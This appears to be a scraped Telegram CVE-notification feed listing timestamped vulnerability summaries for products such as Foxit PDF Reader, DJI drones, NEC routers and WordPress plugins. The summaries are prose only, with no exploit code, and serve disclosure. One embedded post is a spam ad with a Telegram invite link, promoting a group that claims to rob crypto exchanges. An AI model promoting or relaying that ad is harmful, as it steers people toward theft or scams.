🚨 CVE-2024-30342Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22720.🎖@cveNotify |
|
| 2024-04-02 20:37:41 |
🚨 CVE-2024-30340Foxit PDF Reader Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22707.🎖@cveNotify |
|
| 2024-04-02 20:37:37 |
🚨 CVE-2024-30338Foxit PDF Reader Doc Object Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22705.🎖@cveNotify |
|
| 2024-04-02 20:37:36 |
🚨 CVE-2024-29834This vulnerability allows authenticated users with produce or consume permissions to perform unauthorized operations on partitioned topics, such as unloading topics and triggering compaction. These management operations should be restricted to users with the tenant admin role or superuser role. An authenticated user with produce permission can create subscriptions and update subscription properties on partitioned topics, even though this should be limited to users with consume permissions. This impact analysis assumes that Pulsar has been configured with the default authorization provider. For custom authorization providers, the impact could be slightly different. Additionally, the vulnerability allows an authenticated user to read, create, modify, and delete namespace properties in any namespace in any tenant. In Pulsar, namespace properties are reserved for user provided metadata about the namespace.This issue affects Apache Pulsar versions from 2.7.1 to 2.10.6, from 2.11.0 to 2.11.4, from 3.0.0 to 3.0.3, from 3.1.0 to 3.1.3, and from 3.2.0 to 3.2.1. 3.0 Apache Pulsar users should upgrade to at least 3.0.4.3.1 and 3.2 Apache Pulsar users should upgrade to at least 3.2.2.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.🎖@cveNotify |
|
| 2024-04-02 20:37:32 |
🚨 CVE-2024-30531Server-Side Request Forgery (SSRF) vulnerability in Nelio Software Nelio Content.This issue affects Nelio Content: from n/a through 3.2.0.🎖@cveNotify |
|
| 2024-04-02 20:37:31 |
🚨 CVE-2024-31109Cross-Site Request Forgery (CSRF) vulnerability in Toastie Studio Woocommerce Social Media Share Buttons allows Stored XSS.This issue affects Woocommerce Social Media Share Buttons: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-04-02 20:37:30 |
🚨 CVE-2024-31105Cross-Site Request Forgery (CSRF) vulnerability in Adam Bowen Tax Rate Upload allows Reflected XSS.This issue affects Tax Rate Upload: from n/a through 2.4.5.🎖@cveNotify |
|
| 2024-04-02 20:37:26 |
🚨 CVE-2024-30808An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap-use-after-free in AP4_SubStream::~AP4_SubStream at Ap4ByteStream.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42ts.🎖@cveNotify |
|
| 2024-04-02 20:37:25 |
🚨 CVE-2024-30806An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.🎖@cveNotify |
|
| 2024-04-02 20:37:24 |
🚨 CVE-2024-30335Foxit PDF Reader AcroForm Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22641.🎖@cveNotify |
|
| 2024-04-02 19:37:32 |
🚨 CVE-2024-30532Server-Side Request Forgery (SSRF) vulnerability in Builderall Team Builderall Builder for WordPress.This issue affects Builderall Builder for WordPress: from n/a through 2.0.1.🎖@cveNotify |
|
| 2024-04-02 19:37:31 |
🚨 CVE-2024-30531Server-Side Request Forgery (SSRF) vulnerability in Nelio Software Nelio Content.This issue affects Nelio Content: from n/a through 3.2.0.🎖@cveNotify |
|
| 2024-04-02 19:37:28 |
🚨 CVE-2024-24888Server-Side Request Forgery (SSRF) vulnerability in Kadence WP Gutenberg Blocks by Kadence Blocks.This issue affects Gutenberg Blocks by Kadence Blocks: from n/a through 3.2.25.🎖@cveNotify |
|
| 2024-04-02 19:37:27 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-04-02 19:37:26 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-04-02 19:07:24 |
🚨 CVE-2011-0419Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.🎖@cveNotify |
|
| 2024-04-02 18:37:46 |
🚨 CVE-2024-30808An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap-use-after-free in AP4_SubStream::~AP4_SubStream at Ap4ByteStream.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42ts.🎖@cveNotify |
|
| 2024-04-02 18:37:45 |
🚨 CVE-2024-30806An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.🎖@cveNotify |
|
| 2024-04-02 18:37:44 |
🚨 CVE-2024-30335Foxit PDF Reader AcroForm Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22641.🎖@cveNotify |
|
| 2024-04-02 18:37:41 |
🚨 CVE-2024-3151A vulnerability, which was classified as problematic, was found in Bdtask Multi-Store Inventory Management System up to 20240325. Affected is an unknown function of the file /stockmovment/stockmovment/delete/ of the component Stock Movement Page. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258924. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-02 18:37:40 |
🚨 CVE-2024-28287A DOM-based open redirection in the returnUrl parameter of INSTINCT UI Web Client 6.5.0 allows attackers to redirect users to malicious sites via a crafted URL.🎖@cveNotify |
|
| 2024-04-02 18:37:39 |
🚨 CVE-2024-22247VMware SD-WAN Edge contains a missing authentication and protection mechanism vulnerability.A malicious actor with physical access to the SD-WAN Edge appliance during activation can potentially exploit this vulnerability to access the BIOS configuration. In addition, the malicious actor may be able to exploit the default boot priority configured.🎖@cveNotify |
|
| 2024-04-02 18:37:34 |
🚨 CVE-2024-30248Piccolo Admin is an admin interface/content management system for Python, built on top of Piccolo. Piccolo's admin panel allows media files to be uploaded. As a default, SVG is an allowed file type for upload. An attacker can upload an SVG which when loaded can allow arbitrary access to the admin page. This vulnerability was patched in version 1.3.2.🎖@cveNotify |
|
| 2024-04-02 18:07:33 |
🚨 CVE-2024-22353IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.3 is vulnerable to a denial of service, caused by sending a specially crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. IBM X-Force ID: 280400.🎖@cveNotify |
|
| 2024-04-02 18:07:32 |
🚨 CVE-2023-50959IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2,19.0.1, 19.0.2, 19.0.3,20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1,2 2.0.2, 23.0.1, and 23.0.2 may allow end users to query more documents than expected from a connected Enterprise Content Management system when configured to use a system account. IBM X-Force ID: 275938.🎖@cveNotify |
|
| 2024-04-02 18:07:29 |
🚨 CVE-2023-50311IBM CICS Transaction Gateway for Multiplatforms 9.2 and 9.3 transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. IBM X-Force ID: 273612.🎖@cveNotify |
|
| 2024-04-02 18:07:28 |
🚨 CVE-2016-8399An elevation of privilege vulnerability in the kernel networking subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Moderate because it first requires compromising a privileged process and current compiler optimizations restrict access to the vulnerable code. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31349935.🎖@cveNotify |
|
| 2024-04-02 18:07:27 |
🚨 CVE-2009-3278The QNAP TS-239 Pro and TS-639 Pro with firmware 2.1.7 0613, 3.1.0 0627, and 3.1.1 0815 use the rand library function to generate a certain recovery key, which makes it easier for local users to determine this key via a brute-force attack.🎖@cveNotify |
|
| 2024-04-02 17:37:25 |
🚨 CVE-2024-2435For an attacker with pre-existing access to send a signal to a workflow, the attacker can make the signal name a script that executes when a victim views that signal. The XSS is in the timeline page displaying the workflow execution details of the workflow that was sent the crafted signal.Access to send a signal to a workflow is determined by how you configured the authorizer on your server. This includes any entity with permission to directly call SignalWorkflowExecution or SignalWithStartWorkflowExecution, or any entity can deploy a worker that has access to call workflow progress APIs (specifically RespondWorkflowTaskCompleted).🎖@cveNotify |
|
| 2024-04-02 17:37:24 |
🚨 CVE-2024-28287A DOM-based open redirection in the returnUrl parameter of INSTINCT UI Web Client 6.5.0 allows attackers to redirect users to malicious sites via a crafted URL.🎖@cveNotify |
|
| 2024-04-02 16:37:25 |
🚨 CVE-2024-22248VMware SD-WAN Orchestrator contains an open redirect vulnerability.A malicious actor may be able to redirect a victim to an attacker controlled domain due to improper path handling leading to sensitive information disclosure.🎖@cveNotify |
|
| 2024-04-02 16:37:24 |
🚨 CVE-2024-22246VMware SD-WAN Edge contains an unauthenticated command injection vulnerability potentially leading to remote code execution.A malicious actor with local access to the Edge Router UI during activation may be able to perform a command injection attack that could lead to full control of the router.🎖@cveNotify |
|
| 2024-04-02 14:51:30 |
❌ THE MOST PRIVATE GROUP №1 ❌They are robbing Crypto Exchanges for Millions of dollars!Yesterday profit = 50,000$+👉 https://t.me/+shrfpKMaEw9jY2Rl👉 https://t.me/+shrfpKMaEw9jY2Rl👉 https://t.me/+shrfpKMaEw9jY2RlJoin fast! First 1000 subs will be accepted! 👀🚀 |
|
| 2024-04-02 14:37:26 |
🚨 CVE-2024-30621Tenda AX1803 v1.0.0.1 contains a stack overflow via the serverName parameter in the function fromAdvSetMacMtuWan.🎖@cveNotify |
|
| 2024-04-02 14:37:25 |
🚨 CVE-2023-6950An Improper Input Validation vulnerability affecting the FTP service running on the DJI Mavic Mini 3 Pro could allow an attacker to craft a malicious packet containing a malformed path provided to the FTP SIZE command that leads to a denial-of-service attack of the FTP service itself.🎖@cveNotify |
|
| 2024-04-02 14:37:24 |
🚨 CVE-2023-6949A Missing Authentication for Critical Function issue affecting the HTTP service running on the DJI Mavic Mini 3 Pro on the standard port 80 could allow an attacker to enumerate and download videos and pictures saved on the drone internal or external memory without requiring any kind of authentication.🎖@cveNotify |
|
| 2024-04-02 13:37:26 |
🚨 CVE-2024-30946DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /src/dede/co_do.php.🎖@cveNotify |
|
| 2024-04-02 13:37:25 |
🚨 CVE-2024-29514File Upload vulnerability in lepton v.7.1.0 allows a remote authenticated attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2024-04-02 13:37:24 |
🚨 CVE-2023-50313IBM WebSphere Application Server 8.5 and 9.0 could provide weaker than expected security for outbound TLS connections caused by a failure to honor user configuration. IBM X-Force ID: 274812.🎖@cveNotify |
|
| 2024-04-02 13:07:44 |
🚨 CVE-2024-0637Centreon updateDirectory SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.The specific flaw exists within the updateDirectory function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22294.🎖@cveNotify |
|
| 2024-04-02 13:07:43 |
🚨 CVE-2023-51572Voltronic Power ViewPower Pro getMacAddressByIp Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability.The specific flaw exists within the getMacAddressByIP function. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-21163.🎖@cveNotify |
|
| 2024-04-02 13:07:42 |
🚨 CVE-2023-51570Voltronic Power ViewPower Pro Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability.The specific flaw exists within the RMI interface, which listens on TCP port 41009 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-21012.🎖@cveNotify |
|
| 2024-04-02 13:07:38 |
🚨 CVE-2024-29435An issue discovered in Alldata v0.4.6 allows attacker to run arbitrary commands via the processId parameter.🎖@cveNotify |
|
| 2024-04-02 13:07:37 |
🚨 CVE-2023-48906Stack Overflow vulnerability in Btstack 1.6 and earlier allows attackers to cause a denial of service via crafted input to the char_for_nibble function.🎖@cveNotify |
|
| 2024-04-02 13:07:36 |
🚨 CVE-2024-3131A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_category. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258874 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-02 13:07:32 |
🚨 CVE-2024-3129A vulnerability was found in SourceCodester Image Accordion Gallery App 1.0. It has been classified as critical. This affects an unknown part of the file /endpoint/add-image.php. The manipulation of the argument image_name leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258873 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-02 13:07:31 |
🚨 CVE-2024-30863netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /WebPages/history.php.🎖@cveNotify |
|
| 2024-04-02 13:07:30 |
🚨 CVE-2024-30862netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /3g/index.php.🎖@cveNotify |
|
| 2024-04-02 13:07:27 |
🚨 CVE-2024-30861netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/configguide/ipsec_guide_1.php.🎖@cveNotify |
|
| 2024-04-02 11:37:35 |
🚨 CVE-2024-29948There is an out-of-bounds read vulnerability in some Hikvision NVRs. An authenticated attacker could exploit this vulnerability by sending specially crafted messages to a vulnerable device, causing a service abnormality.🎖@cveNotify |
|
| 2024-04-02 11:37:31 |
🚨 CVE-2023-6951A Use of Weak Credentials vulnerability affecting the Wi-Fi network generated by a set of DJI drones could allow a remote attacker to derive the WPA2 PSK key and authenticate without permission to the drone’s Wi- Fi network. This, in turn, allows the attacker to perform unauthorized interaction with the network services exposed by the drone and to potentially decrypt the Wi-Fi traffic exchanged between the drone and the Android/IOS device of the legitimate user during QuickTransfer mode. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620.🎖@cveNotify |
|
| 2024-04-02 11:37:30 |
🚨 CVE-2023-6949** DISPUTED ** A Missing Authentication for Critical Function issue affecting the HTTP service running on the DJI Mavic Mini 3 Pro on the standard port 80 could allow an attacker to enumerate and download videos and pictures saved on the drone internal or external memory without requiring any kind of authentication.🎖@cveNotify |
|
| 2024-04-02 11:37:29 |
🚨 CVE-2023-6948A Buffer Copy without Checking Size of Input issue affecting the v2_sdk_service running on a set of DJI drone devices on the port 10000 could allow an attacker to cause a crash of the service through a crafted payload triggering a missing input size check in the sdk_printf function implemented in the libv2_sdk.so library used by the dji_vtwo_sdk binary implementing the service, compromising it in a term of availability and producing a denial-of-service attack. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620.🎖@cveNotify |
|
| 2024-04-02 11:37:26 |
🚨 CVE-2023-51456A Improper Input Validation issue affecting the v2_sdk_service running on a set of DJI drone devices on the port 10000 could allow an attacker to trigger an out-of-bound read/write into the process memory through a crafted payload due to a missing input sanity check in the v2_pack_array_to_msg function implemented in the libv2_sdk.so library imported by the v2_sdk_service binary implementing the service, potentially leading to a memory information leak or an arbitrary code execution. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620.🎖@cveNotify |
|
| 2024-04-02 11:37:25 |
🚨 CVE-2023-51453A Improper Input Validation issue affecting the v2_sdk_service running on a set of DJI drone devices on the port 10000 could allow an attacker to cause a crash of the service through a crafted payload triggering a missing input size check in the process_push_file function implemented in the libv2_sdk.so library used by the dji_vtwo_sdk binary implementing the service, compromising it in a term of availability and producing a denial-of-service attack. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620.🎖@cveNotify |
|
| 2024-04-02 11:37:24 |
🚨 CVE-2023-51452A Improper Input Validation issue affecting the v2_sdk_service running on a set of DJI drone devices on the port 10000 could allow an attacker to cause a crash of the service through a crafted payload triggering a missing input size check in the pull_file_v2_proc function implemented in the libv2_sdk.so library used by the dji_vtwo_sdk binary implementing the service, compromising it in a term of availability and producing a denial-of-service attack. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620.🎖@cveNotify |
|
| 2024-04-02 10:37:32 |
🚨 CVE-2024-1946The Genesis Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the block content in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-02 10:37:31 |
🚨 CVE-2024-1732The Sharkdropship for AliExpress Dropshipping and Affiliate plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wads_removeProductFromShop() function in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to delete arbitrary posts.🎖@cveNotify |
|
| 2024-04-02 09:37:24 |
🚨 CVE-2024-2931The WPFront User Role Editor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.1.11184 via the wpfront_user_role_editor_assign_roles_user_autocomplete AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract retrieve a list of all user email addresses who are registered on the site.🎖@cveNotify |
|
| 2024-04-02 08:37:47 |
🚨 CVE-2024-31005An issue in Bento4 Bento v.1.6.0-641 allows a remote attacker to execute arbitrary code via the Ap4MdhdAtom.cpp,AP4_MdhdAtom::AP4_MdhdAtom,mp4fragment🎖@cveNotify |
|
| 2024-04-02 08:37:43 |
🚨 CVE-2024-31004An issue in Bento4 Bento v.1.6.0-641 allows a remote attacker to execute arbitrary code via the Ap4StsdAtom.cpp,AP4_StsdAtom::AP4_StsdAtom,mp4fragment.🎖@cveNotify |
|
| 2024-04-02 08:37:42 |
🚨 CVE-2024-20799Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-04-02 08:37:41 |
🚨 CVE-2024-1300A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.🎖@cveNotify |
|
| 2024-04-02 06:37:42 |
🚨 CVE-2024-2924The Creative Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.5.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-02 06:37:38 |
🚨 CVE-2024-2791The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-02 06:37:37 |
🚨 CVE-2024-1504The SecuPress Free — WordPress Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.5.1. This is due to missing or incorrect nonce validation on the secupress_blackhole_ban_ip() function. This makes it possible for unauthenticated attackers to block a user's IP via a forged request granted they can trick the user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-02 06:37:36 |
🚨 CVE-2024-28015Improper Neutralization of Special Elements used in an OS Command vulnerability in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker to execute an arbitrary OS command with the root privilege via the internet.🎖@cveNotify |
|
| 2024-04-02 06:37:31 |
🚨 CVE-2024-28013Use of Insufficiently Random Values vulnerability in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker to change settings via the internet.🎖@cveNotify |
|
| 2024-04-02 06:37:30 |
🚨 CVE-2024-28010Use of Hard-coded Password in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker to execute an arbitrary OS command via the internet.🎖@cveNotify |
|
| 2024-04-02 06:37:26 |
🚨 CVE-2024-28008Active Debug Code in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker to execute an arbitrary OS command via the internet.🎖@cveNotify |
|
| 2024-04-02 06:37:25 |
🚨 CVE-2024-28006Improper authentication vulnerability in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker to view device information.🎖@cveNotify |
|
| 2024-04-02 06:37:24 |
🚨 CVE-2024-28005Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN MR02LN, WG1810HP(JE) and WG1810HP(MF) all versions allows a attacker who has obtained high privileges can execute arbitrary scripts.🎖@cveNotify |
|
| 2024-04-02 05:37:24 |
🚨 CVE-2024-2369The Page Builder Gutenberg Blocks WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-04-02 04:37:24 |
🚨 CVE-2024-25187Server Side Request Forgery (SSRF) vulnerability in 71cms v1.0.0, allows remote unauthenticated attackers to obtain sensitive information via getweather.html.🎖@cveNotify |
|
| 2024-04-02 03:37:39 |
🚨 CVE-2024-20846Out-of-bounds write vulnerability while decoding hcr of libsavsac.so prior to SMR Apr-2024 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-02 03:37:33 |
